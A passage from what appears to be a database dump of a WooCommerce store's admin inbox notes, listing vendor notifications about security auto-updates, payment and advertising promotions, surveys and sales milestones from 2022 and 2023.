Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br /><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(29,'woocommerce-blocks-sqli-july-2021-store-patched','update','en_US','Solved: Critical vulnerabilities patched in WooCommerce Blocks','In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br /><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(30,'habit-moment-survey','marketing','en_US','We’re all ears! Share your experience so far with WooCommerce','We’d love your input to shape the future of WooCommerce together. Feel free to share any feedback, ideas or suggestions that you have.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(31,'ecomm-wc-navigation-survey','info','en_US','We’d like your feedback on the WooCommerce navigation','We’re making improvements to the WooCommerce navigation and would love your feedback. Share your experience in this 2 minute survey.','{}','pending','woocommerce.com','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(32,'wc-refund-returns-page','info','en_US','Setup a Refund and Returns Policy page to boost your store\'s credibility.','We have created a sample draft Refund and Returns Policy page for you. Please have a look and update it to fit your store.','{}','unactioned','woocommerce-core','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(33,'wc-admin-wc-helper-connection','info','en_US','Connect to WooCommerce.com','Connect to get important product notifications and updates.','{}','unactioned','woocommerce-admin','2022-01-24 07:43:19',NULL,0,'plain','',0,0,'info'),(35,'wc-admin-customizing-product-catalog','info','en_US','How to customize your product catalog','You want your product catalog and images to look great and align with your brand. This guide will give you all the tips you need to get your products looking great in your store.','{}','unactioned','woocommerce-admin','2022-01-24 07:49:06',NULL,0,'plain','',0,0,'info'),(38,'wc-admin-launch-checklist','info','en_US','Ready to launch your store?','To make sure you never get that sinking \"what did I forget\" feeling, we\'ve put together the essential pre-launch checklist.','{}','unactioned','woocommerce-admin','2022-01-25 09:48:57',NULL,0,'plain','',0,0,'info'),(41,'wc-admin-mobile-app','info','en_US','Install Woo mobile app','Install the WooCommerce mobile app to manage orders, receive sales notifications, and view key metrics — wherever you are.','{}','unactioned','woocommerce-admin','2022-01-27 03:55:31',NULL,0,'plain','',0,0,'info'),(43,'wc-admin-usage-tracking-opt-in','info','en_US','Help WooCommerce improve with usage tracking','Gathering usage data allows us to improve WooCommerce. Your store will be considered as we evaluate new features, judge the quality of an update, or determine if an improvement makes sense. You can always visit the <a href=\"https://www.mangomitra.in/wp-admin/admin.php?page=wc-settings&#038;tab=advanced&#038;section=woocommerce_com\" target=\"_blank\">Settings</a> and choose to stop sharing data. <a href=\"https://woocommerce.com/usage-tracking?utm_medium=product\" target=\"_blank\">Read more</a> about what data we collect.','{}','unactioned','woocommerce-admin','2022-01-31 07:44:40',NULL,0,'plain','',0,0,'info'),(44,'wc-admin-woocommerce-payments','marketing','en_US','Try the new way to get paid','Securely accept credit and debit cards on your site. Manage transactions without leaving your WordPress dashboard. Only with <strong>WooPayments</strong>.<br><br>By clicking \"Get started\", you agree to our <a href=\"https://wordpress.com/tos/\" target=\"_blank\">Terms of Service</a>','{}','unactioned','woocommerce-admin','2022-01-31 07:44:40',NULL,0,'plain','',0,0,'info'),(46,'wc_simple_payments_m2_reader_launch_q1_2022','marketing','en_US','Take quick and easy in-person payments','WooCommerce is continuing to power up your business with our new Simple Payments feature, built exclusively for WooCommerce In-Person Payments. Capture quick and simple payments anywhere else your customers are – or offer a local pickup option with payment taken in-person for orders placed online.','{}','unactioned','woocommerce.com','2022-02-04 07:43:52',NULL,0,'plain','',0,0,'info'),(47,'wcpay_applepay_q1_2022','marketing','en_US','Increase conversions with Apple Pay – just like Diane does','See how Diane from <a href=\"https://woocommerce.com/posts/lady-dye-yarns-from-crafts-to-activism-with-woocommerce/?utm_source=product&amp;utm_medium=inboxnotification&amp;utm_campaign=apple-pay\" target=\"_blank\">Lady Dye Yarns</a> uses Apple Pay to provide customers with the fast, secure checkout experience they love. You can, too – Apple Pay is included in WooCommerce Payments. Here\'s how you can increase conversions by encouraging shoppers to pay with a single tap.','{}','pending','woocommerce.com','2022-02-07 07:43:24',NULL,0,'plain','',0,0,'info'),(48,'stripe_applepay_q1_2022','marketing','en_US','Increase conversions with Apple Pay – just like Thomas does','Read the inspirational story of <a href=\"https://woocommerce.com/posts/incredible-story-of-thomas-trendy-socks-down-syndrome-entrepreneur/?utm_source=product&amp;utm_medium=inboxnotification&amp;utm_campaign=apple-pay\" target=\"_blank\">Thomas\'s Trendy Socks</a> and see how he’s using Apple Pay to provide customers with the fast, secure checkout experience they love. You can, too – ready to turn more visitors into buyers? Accept Apple Pay by selecting Enable express checkouts in Settings &gt; Payments &gt; Stripe.','{}','pending','woocommerce.com','2022-02-07 07:43:24',NULL,0,'plain','',0,0,'info'),(49,'square_applepay_q1_2022','marketing','en_US','Increase conversions with a faster checkout experience','By enabling Apple Pay in Square, your customers can complete purchases quickly and securely with a single touch or a glance – no lengthy checkout forms necessary. Accept Apple Pay by enabling Digital Wallets within Settings &gt; Payments &gt; Square.','{}','pending','woocommerce.com','2022-02-07 07:43:24',NULL,0,'plain','',0,0,'info'),(51,'lead_gen_existing_customers_1','marketing','en_US','Talk to a consultant','As your business grows, you want to optimize costs, streamline operations, and sell more. We can help. Talk to us about how you can get the most out of WooCommerce.','{}','unactioned','woocommerce.com','2022-02-12 07:44:57',NULL,0,'plain','',0,0,'info'),(52,'wc-admin-coupon-page-moved','update','en_US','Coupon management has moved!','Coupons can now be managed from Marketing &gt; Coupons. Click the button below to remove the legacy WooCommerce &gt; Coupons menu item.','{}','unactioned','woocommerce-admin','2022-03-09 08:46:14',NULL,0,'plain','',0,0,'info'),(53,'woocommerce-core-paypal-march-2022-updated','update','en_US','Security auto-update of WooCommerce','<strong>Your store has been updated to the latest secure version of WooCommerce</strong>. We worked with WordPress to deploy PayPal Standard security updates for stores running WooCommerce (version 3.5 to 6.3). It’s recommended to disable PayPal Standard, and use <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal Payments</a> to accept PayPal.','{}','pending','woocommerce.com','2022-03-15 04:46:14',NULL,0,'plain','',0,0,'info'),(54,'woocommerce-core-paypal-march-2022-updated-nopp','update','en_US','Security auto-update of WooCommerce','<strong>Your store has been updated to the latest secure version of WooCommerce</strong>. We worked with WordPress to deploy security updates related to PayPal Standard payment gateway for stores running WooCommerce (version 3.5 to 6.3).','{}','pending','woocommerce.com','2022-03-15 04:46:14',NULL,0,'plain','',0,0,'info'),(55,'wc-update-db-reminder','update','en_US','WooCommerce database update required','WooCommerce has been updated! To keep things running smoothly, we have to update your database to the newest version. The database update process runs in the background and may take a little while, so please be patient. Advanced users can alternatively update via <a href=\"https://github.com/woocommerce/woocommerce/wiki/Upgrading-the-database-using-WP-CLI\">WP CLI</a>.','{}','unactioned','woocommerce-core','2022-09-15 04:09:58',NULL,0,'plain','',0,0,'info'),(56,'pinterest_03_2022_update','marketing','en_US','Your Pinterest for WooCommerce plugin is out of date!','Update to the latest version of Pinterest for WooCommerce to continue using this plugin and keep your store connected with Pinterest. To update, visit <strong>Plugins &gt; Installed Plugins</strong>, and click on “update now” under Pinterest for WooCommerce.','{}','pending','woocommerce.com','2022-09-19 05:36:53',NULL,0,'plain','',0,0,'info'),(57,'store_setup_survey_survey_q2_2022','survey','en_US','How is your store setup going?','Our goal is to make sure you have all the right tools to start setting up your store in the smoothest way possible.\r\nWe’d love to know if we hit our mark and how we can improve. To collect your thoughts, we made a 2-minute survey.','{}','pending','woocommerce.com','2022-09-19 05:36:53',NULL,0,'plain','',0,0,'info'),(58,'wc-admin-wisepad3','marketing','en_US','Take your business on the go in Canada with WooCommerce In-Person Payments','Quickly create new orders, accept payment in person for orders placed online, and automatically sync your inventory – no matter where your business takes you. With WooCommerce In-Person Payments and the WisePad 3 card reader, you can bring the power of your store anywhere.','{}','pending','woocommerce.com','2022-09-19 05:36:53',NULL,0,'plain','',0,0,'info'),(59,'woocommerce-payments-august-2022-need-to-update','update','en_US','Action required: Please update WooCommerce Payments','An updated secure version of WooCommerce Payments is available – please ensure that you’re using the latest patch version. For more information on what action you need to take, please review the article below.','{}','pending','woocommerce.com','2022-09-19 05:36:53',NULL,0,'plain','',0,0,'info'),(60,'woocommerce-payments-august-2022-store-patched','update','en_US','WooCommerce Payments has been automatically updated','You’re now running the latest secure version of WooCommerce Payments. We’ve worked with the WordPress Plugins team to deploy a security update to stores running WooCommerce Payments (version 3.9 to 4.5). For further information, please review the article below.','{}','pending','woocommerce.com','2022-09-19 05:36:53',NULL,0,'plain','',0,0,'info'),(61,'wc-admin-orders-milestone','info','en_US','Congratulations on processing 10 orders!','You\'ve hit the 10 orders milestone! Look at you go. Browse some WooCommerce success stories for inspiration.','{}','unactioned','woocommerce-admin','2022-10-10 21:56:57',NULL,0,'plain','',0,0,'info'),(62,'wc-admin-manage-orders-on-the-go','info','en_US','Manage your orders on the go','Look for orders, customer info, and process refunds in one click with the Woo app.','{}','unactioned','woocommerce-admin','2022-10-10 21:57:18',NULL,0,'plain','',0,0,'info'),(63,'googlelistings_signals2022_hasGLA','marketing','en_US','Show off your products with Ads on Google','You’re ready to grow with ads. Google optimizes for performance across your products; you only pay for results. If you’re new to Google, you can earn up to $500 in ad credits (T&amp;Cs apply). <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">Contact support</a> if you need guidance with Google Listings &amp; Ads.','{}','pending','woocommerce.com','2022-10-10 21:57:18',NULL,0,'plain','',0,0,'info'),(64,'googlelistings_signals2022_noGLA','marketing','en_US','Show off your products with Ads on Google','You’re ready to grow with ads. Google optimizes for performance across your products; you only pay for results. If you’re new to Google, you can earn up to $500 in ad credits (T&amp;Cs apply). <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">Contact support</a> if you need guidance with Google Listings &amp; Ads.','{}','pending','woocommerce.com','2022-10-10 21:57:18',NULL,0,'plain','',0,0,'info'),(65,'shipping_category_q4_2022','marketing','en_US','Save time on shipping','Is your store all set to ship? Save valuable time (and money!) by automating your fulfillment process for the busiest shopping season. Explore our range of trusted shipping partners to get started.','{}','unactioned','woocommerce.com','2022-10-13 10:00:41',NULL,0,'plain','',0,0,'info'),(66,'wc-admin-performance-on-mobile','info','en_US','Track your store performance on mobile','Monitor your sales and high performing products with the Woo app.','{}','unactioned','woocommerce-admin','2022-10-21 10:43:49',NULL,0,'plain','',0,0,'info'),(67,'facebook_q4-2022_hasFB','marketing','en_US','Drive more demand this holiday season with Facebook for WooCommerce','Deliver a personalized and seamless shopping experience this holiday season with Facebook for WooCommerce. With more ad formats than ever, you can create engaging ads that meet customers across Facebook, Instagram, Messenger, and WhatsApp throughout the busy shopping season.','{}','pending','woocommerce.com','2022-10-21 10:43:49',NULL,0,'plain','',0,0,'info'),(68,'facebook_q4-2022_noFB','marketing','en_US','Meet your customers where they are with Facebook for WooCommerce','Don’t wait for your customers to come to you – meet them where they’re browsing! Use the Facebook for WooCommerce extension to promote your products on Facebook, Instagram, Messenger, and WhatsApp. Create seamless shopping experiences – straight from your WooCommerce dashboard.','{}','unactioned','woocommerce.com','2022-10-22 08:47:26',NULL,0,'plain','',0,0,'info'),(69,'tiktok-targeted-q4-2022','marketing','en_US','Get $200 in ad credit from TikTok after you spend $20 on your first campaign','Reach one billion shoppers with TikTok for WooCommerce this holiday season! Sync your product catalog, capture insights, and create ad campaigns right from your dashboard. Connect your store today to unlock this limited time offer! <a href=\"https://ads.tiktok.com/help/article?aid=10011326\">Terms &amp; conditions apply</a>.','{}','pending','woocommerce.com','2022-10-25 14:00:58',NULL,0,'plain','',0,0,'info'),(70,'wc-admin-new-sales-record','info','en_US','New sales record!','Woohoo, October 27th was your record day for sales! Net sales was ₹42,000.00 beating the previous record of ₹220.00 set on January 31st.','{\"old_record_date\":\"2022-01-31\",\"old_record_amt\":220,\"new_record_date\":\"2022-10-27\",\"new_record_amt\":42000}','unactioned','woocommerce-admin','2022-10-28 07:44:32',NULL,0,'plain','',0,0,'info'),(71,'paypal_paylater_g3_q4_22','marketing','en_US','Turn browsers into buyers with Pay Later','Add PayPal at checkout, plus give customers a buy now, pay later option from the name they trust. With Pay in 4 &amp; Pay Monthly, available in PayPal Payments, you get paid up front while letting customers spread their payments over time. Boost your average order value and convert more sales – at no extra cost to you.','{}','pending','woocommerce.com','2022-11-02 09:27:21',NULL,0,'plain','',0,0,'info'),(72,'woocommerce_admin_deprecation_q4_2022','info','en_US','WooCommerce Admin is part of WooCommerce!','To make sure your store continues to run smoothly, check that WooCommerce is up-to-date – at least version 6.5 – and then disable the WooCommerce Admin plugin.','{}','pending','woocommerce.com','2022-11-04 08:09:30',NULL,0,'plain','',0,0,'info'),(73,'paypal_paylater_g2_q4_22','marketing','en_US','Upgrade to PayPal Payments to offer Pay Later at checkout','PayPal Pay Later is included in PayPal Payments at no additional cost to you. Customers can spread their payments over time while you get paid up front. \r\nThere’s never been a better time to upgrade your PayPal plugin. Simply download it and connect with a PayPal Business account.','{}','pending','woocommerce.com','2022-11-04 08:09:30',NULL,0,'plain','',0,0,'info'),(74,'google_listings_ads_custom_attribute_mapping_q4_2022','marketing','en_US','Our latest improvement to the Google Listings & Ads extension: Attribute Mapping','You spoke, we listened. This new feature enables you to easily upload your products, customize your product attributes in one place, and target shoppers with more relevant ads. Extend how far your ad dollars go with each campaign.','{}','pending','woocommerce.com','2022-12-01 08:56:22',NULL,0,'plain','',0,0,'info'),(75,'wc-admin-manualauthcapture','marketing','en_US','Miss fewer manual payments in WooCommerce Payments','Using WooCommerce Payments to manually authorize and capture payments? We’ve introduced a simplified and more efficient process, so you can miss fewer payments and continue to grow your revenue.','{}','pending','woocommerce.com','2022-12-01 08:56:22',NULL,0,'plain','',0,0,'info'),(76,'apple_pay_square_q422','marketing','en_US','Grow your business with Apple Pay','Start boosting your online conversions today with Apple Pay – shoppers can safely complete a purchase with a touch or a glance and are more likely to come back. Enable Apple Pay with Square by selecting  Settings &gt; Payments &gt; Square.','{}','pending','woocommerce.com','2022-12-08 09:54:14',NULL,0,'plain','',0,0,'info'),(77,'apple_pay_wcpay_q422','marketing','en_US','Grow your business with Apple Pay','Start boosting your online conversions today with Apple Pay – shoppers can safely complete a purchase with a touch or a glance and are more likely to come back. Confirm Apple Pay is enabled by selecting Payments &gt; Settings and making sure Enable express checkouts is checked.','{}','pending','woocommerce.com','2022-12-08 09:54:14',NULL,0,'plain','',0,0,'info'),(78,'meta-hasFB-dec-q4-2022','marketing','en_US','Power up your Facebook ad strategy','Did you know that new privacy policies may be decreasing the effectiveness of your Facebook ads? Get back on track with Meta’s Conversion API. It creates a direct connection between the marketing data from your store and Meta, helping you more accurately track, attribute and improve your Facebook marketing performance.','{}','pending','woocommerce.com','2022-12-10 09:10:30',NULL,0,'plain','',0,0,'info'),(79,'meta-noFB-dec-q4-2022','marketing','en_US','Create highly targeted Facebook ads with Facebook for WooCommerce','Sync your product catalog to create Facebook ads and track their performance – all from within your WooCommerce dashboard. With improved tracking signals and speed, plus more accurate tracking with the introduction of Meta’s Conversion API, you’ll have all the tools you need to run effective ad campaigns.','{}','unactioned','woocommerce.com','2022-12-11 22:39:36',NULL,0,'plain','',0,0,'info'),(80,'needs-update-eway-payment-gateway-rin-2022-12-20','update','en_US','Security vulnerability patched in WooCommerce Eway Gateway','In response to a potential vulnerability identified in WooCommerce Eway Gateway versions 3.1.0 to 3.5.0, we’ve worked to deploy security fixes and have released an updated version.\r\nNo external exploits have been detected, but we recommend you update to your latest supported version 3.1.26, 3.2.3, 3.3.1, 3.4.6, or 3.5.1','{}','pending','woocommerce.com','2023-01-05 22:39:03',NULL,0,'plain','',0,0,'info'),(81,'updated-eway-payment-gateway-rin-2022-12-20','update','en_US','WooCommerce Eway Gateway has been automatically updated','Your store is now running the latest secure version of WooCommerce Eway Gateway. We worked with the WordPress Plugins team to deploy a software update to stores running WooCommerce Eway Gateway (versions 3.1.0 to 3.5.0) in response to a security vulnerability that was discovered.','{}','pending','woocommerce.com','2023-01-05 22:39:03',NULL,0,'plain','',0,0,'info'),(82,'storeediting_feedback_jan_2023','marketing','en_US','Tell us what you need to customize your store!','We need your feedback. Please spare a few minutes to share your input on what is most important to you when designing and customizing your storefront to help us build the features you need.','{}','unactioned','woocommerce.com','2023-01-18 02:16:53',NULL,0,'plain','',0,0,'info'),(83,'ecomm-wc-navigation-survey-2023','info','en_US','Navigating WooCommerce on WordPress.com','We are improving the WooCommerce navigation on WordPress.com and would love your help to make it better! Please share your experience with us in this 2-minute survey.','{}','pending','woocommerce.com','2023-01-18 02:16:53',NULL,0,'plain','',0,0,'info'),(84,'wc-admin-edit-products-on-the-move','info','en_US','Edit products on the move','Edit and create new products from your mobile devices with the Woo app','{}','unactioned','woocommerce-admin','2023-01-24 10:17:37',NULL,0,'plain','',0,0,'info'),(85,'affirm_q1_2023','marketing','en_US','Turn more browsers into buyers with flexible payments','When you offer flexible payment options to shoppers, they\'re more likely to convert. It’s why businesses offering Affirm see an average order value lift of 63%. Affirm tailors your store\'s payment options with terms proven to reach new customers, boost conversions, and grow sales.','{}','pending','woocommerce.com','2023-03-13 08:44:24',NULL,0,'plain','',0,0,'info'),(86,'google_listings_ads_pmax_i1_q1_2023_no_gla','marketing','en_US','Create more engaging ads – without the hard work','Get in front of millions of shoppers searching for products like yours with Google Listings &amp; Ads. With new customization features, Google automatically tests multiple combinations of text and images to create the most engaging ad to boost your business. Plus, get up to $500 in ad credit – terms and conditions apply.','{}','unactioned','woocommerce.com','2023-03-16 07:45:37',NULL,0,'plain','',0,0,'info'),(87,'google_listings_ads_pmax_i1_q1_2023_with_gla','marketing','en_US','New customization features to boost your business','You can now add custom images, messaging, and URLs to campaigns in Google Listings &amp; Ads. Google then automatically tests multiple combinations to create the most engaging version to help boost your business. Get more sales with dynamic content – edit an existing campaign or create a new ad now.','{}','pending','woocommerce.com','2023-03-16 07:45:37',NULL,0,'plain','',0,0,'info'),(88,'woocommerce-wcpay-march-2023-update-needed','update','en_US','Action required: Security update for WooCommerce Payments','<strong>Your store requires a security update for WooCommerce Payments</strong>. Please update to the latest version of WooCommerce Payments immediately to address a potential vulnerability discovered on March 22. For more information on how to update, visit this WooCommerce Developer Blog Post.','{}','pending','woocommerce.com','2023-03-24 07:54:08',NULL,0,'plain','',0,0,'info'),(89,'tap_to_pay_iphone_q2_2023_no_wcpay','marketing','en_US','Accept in-person contactless payments on your iPhone','Tap to Pay on iPhone and WooCommerce Payments is quick, secure, and simple to set up — no extra terminals or card readers are needed. Accept contactless debit and credit cards, Apple Pay, and other NFC digital wallets in person.','{}','unactioned','woocommerce.com','2023-04-04 08:38:09',NULL,0,'plain','',0,0,'info'),(90,'tap_to_pay_iphone_q2_2023_with_wcpay','marketing','en_US','New: accept in-person contactless payments on your iPhone','Tap to Pay on iPhone is quick, secure, and simple to set up in WooCommerce Payments — no extra terminals or card readers are needed. Accept contactless debit and credit cards, Apple Pay, and other NFC digital wallets in person in a few short steps!','{}','pending','woocommerce.com','2023-04-04 08:38:09',NULL,0,'plain','',0,0,'info'),(91,'woocommerce-WCPreOrders-april-2023-update-needed','update','en_US','Action required: Security update of WooCommerce Pre-Orders extension','<strong>Your store requires a security update for the WooCommerce Pre-Orders extension</strong>. Please update the WooCommerce Pre-Orders extension immediately to address a potential vulnerability discovered on April 11.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(92,'wc-admin-wcpay-denmark-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Denmark!','We’ve recently released WooCommerce Payments in Denmark. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(93,'wc-admin-wcpay-greece-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Greece!','We’ve recently released WooCommerce Payments in Greece. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(94,'wc-admin-wcpay-norway-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Norway!','We’ve recently released WooCommerce Payments in Norway. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(95,'wc-admin-wcpay-slovakia-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Slovakia!','We’ve recently released WooCommerce Payments in Slovakia. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(96,'wc-admin-wcpay-finland-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Finland!','We’ve recently released WooCommerce Payments in Finland. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(97,'wc-admin-wcpay-estonia-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Estonia!','We’ve recently released WooCommerce Payments in Estonia. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(98,'wc-admin-wcpay-lithuania-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Lithuania!','We’ve recently released WooCommerce Payments in Lithuania. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(99,'wc-admin-wcpay-slovenia-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Slovenia!','We’ve recently released WooCommerce Payments in Slovenia. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(100,'wc-admin-wcpay-latvia-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Latvia!','We’ve recently released WooCommerce Payments in Latvia. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(101,'wc-admin-wcpay-cyprus-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Cyprus!','We’ve recently released WooCommerce Payments in Cyprus. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(102,'wc-admin-wcpay-malta-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Malta!','We’ve recently released WooCommerce Payments in Malta. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(103,'wc-admin-wcpay-luxembourg-Q2-2023','marketing','en_US','WooCommerce Payments is now available in Luxembourg!','We’ve recently released WooCommerce Payments in Luxembourg. You can view and manage transactions right in your WordPress dashboard while securely accepting major cards, Apple Pay, and payments in over 100 currencies.','{}','pending','woocommerce.com','2023-04-15 12:36:43',NULL,0,'plain','',0,0,'info'),(104,'wc_admin_BNPL_WCPay_coming-soon_Q1_2023','marketing','en_US','Buy now, pay later is heading to WooCommerce Payments','Great news: full integration with Afterpay and Affirm is on its way to WooCommerce Payments! You’ll soon be able to increase your order values, sell more, and offer customers a payment option they’ll love — with no extra downloads or extensions required.','{}','pending','woocommerce.com','2023-04-27 10:19:25',NULL,0,'plain','',0,0,'info'),(105,'woopay-beta-existingmerchants-noaction-27APR23','info','en_US','WooPay is back!','Thanks for previously trying WooPay, the express checkout feature built into WooCommerce Payments. We’re excited to announce that WooPay availability has resumed. No action is required on your part.\r\n<br /><br />\r\nYou can now continue boosting conversions by offering your customers a simple, secure way to pay with a single click.','{}','pending','woocommerce.com','2023-04-28 07:48:11',NULL,0,'plain','',0,0,'info'),(106,'woopay-beta-existingmerchants-update-27APR23','info','en_US','WooPay is back!','Thanks for previously trying WooPay, the express checkout feature built into WooCommerce Payments. We’re excited to announce that WooPay availability has resumed.\r\n<br /><br />\r\n\r\nUpdate to the latest WooCommerce Payments version to continue boosting conversions by offering your customers a simple, secure way to pay with a single click.','{}','pending','woocommerce.com','2023-04-28 07:48:11',NULL,0,'plain','',0,0,'info'),(107,'woopay-beta-existingmerchants-noaction-27APR23-test2','info','en_US','WooPay is back!','Thanks for previously trying WooPay, the express checkout feature built into WooCommerce Payments. We’re excited to announce that WooPay availability has resumed. No action is required on your part.\r\n<br /><br />\r\nYou can now continue boosting conversions by offering your customers a simple, secure way to pay with a single click.','{}','pending','woocommerce.com','2023-04-28 07:48:11',NULL,0,'plain','',0,0,'info'),(108,'woopay-beta-existingmerchants-update-27APR23-test','info','en_US','WooPay is back!','Thanks for previously trying WooPay, the express checkout feature built into WooCommerce Payments. We’re excited to announce that WooPay availability has resumed.\r\n<br /><br />\r\n\r\nUpdate to the latest WooCommerce Payments version to continue boosting conversions by offering your customers a simple, secure way to pay with a single click.','{}','pending','woocommerce.com','2023-04-28 07:48:11',NULL,0,'plain','',0,0,'info'),(109,'woopay-beta-merchantrecruitment-04MAY23','info','en_US','Increase conversions with WooPay — our fastest checkout yet','WooPay, a new express checkout feature built into WooCommerce Payments, is now available —and we’re inviting you to be one of the first to try it. \r\n<br><br>\r\nBoost conversions by offering your customers a simple, secure way to pay with a single click.\r\n<br><br>\r\nGet started in seconds.','{}','pending','woocommerce.com','2023-05-05 07:53:57',NULL,0,'plain','',0,0,'info'),(110,'woopay-beta-merchantrecruitment-update-04MAY23','info','en_US','Increase conversions with WooPay — our fastest checkout yet','WooPay, a new express checkout feature built into WooCommerce Payments, is now available — and you’re invited to try it. \r\n<br /><br />\r\nBoost conversions by offering your customers a simple, secure way to pay with a single click.\r\n<br /><br />\r\nUpdate WooCommerce Payments to get started.','{}','pending','woocommerce.com','2023-05-05 07:53:57',NULL,0,'plain','',0,0,'info'),(111,'woopay-beta-merchantrecruitment-short-04MAY23','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, a new express checkout feature for WooCommerce Payments. \r\n<br><br>\r\nBoost conversions by letting customers pay with a single click.','{}','pending','woocommerce.com','2023-05-05 07:53:57',NULL,0,'plain','',0,0,'info'),(112,'woopay-beta-merchantrecruitment-short-update-04MAY23','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, our new express checkout feature. <br>Boost conversions by letting customers pay with a single click. <br><br>Update to the latest version of WooCommerce Payments to get started.','{}','pending','woocommerce.com','2023-05-05 07:53:57',NULL,0,'plain','',0,0,'info'),(113,'woopay-beta-merchantrecruitment-short-06MAY23-TESTA','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, a new express checkout feature for WooCommerce Payments. \r\n<br><br>\r\nBoost conversions by letting customers pay with a single click.','{}','pending','woocommerce.com','2023-05-07 09:04:04',NULL,0,'plain','',0,0,'info'),(114,'woopay-beta-merchantrecruitment-short-06MAY23-TESTB','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, a new express checkout feature for WooCommerce Payments. \r\n<br><br>\r\nBoost conversions by letting customers pay with a single click.','{}','pending','woocommerce.com','2023-05-07 09:04:04',NULL,0,'plain','',0,0,'info'),(115,'woopay-beta-merchantrecruitment-short-06MAY23-TESTC','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, a new express checkout feature for WooCommerce Payments. \r\n<br><br>\r\nBoost conversions by letting customers pay with a single click.','{}','pending','woocommerce.com','2023-05-07 09:04:04',NULL,0,'plain','',0,0,'info'),(116,'woopay-beta-merchantrecruitment-short-06MAY23-TESTD','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, a new express checkout feature for WooCommerce Payments. \r\n<br><br>\r\nBoost conversions by letting customers pay with a single click.','{}','pending','woocommerce.com','2023-05-07 09:04:04',NULL,0,'plain','',0,0,'info'),(117,'woopay-beta-merchantrecruitment-short-09MAY23','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, a new express checkout feature for WooCommerce Payments. \r\n<br><br>\r\nBoost conversions by letting customers pay with a single click.','{}','pending','woocommerce.com','2023-05-10 07:54:27',NULL,0,'plain','',0,0,'info'),(118,'woopay-beta-merchantrecruitment-short-update-09MAY23','info','en_US','Increase conversions with WooPay — our fastest checkout yet','Be one of the first to try WooPay, our new express checkout feature. <br>Boost conversions by letting customers pay with a single click. <br><br>Update to the latest version of WooCommerce Payments to get started.','{}','pending','woocommerce.com','2023-05-10 07:54:27',NULL,0,'plain','',0,0,'info'),(119,'payoneer_q2_2023','marketing','en_US','Grow with the next generation of payment processing','Ready to stand out in the new global economy? Payoneer Checkout gives you the power to securely accept payments worldwide, build a checkout that customers love, and manage your store’s transactions and finances – all from the same place.','{}','unactioned','woocommerce.com','2023-05-14 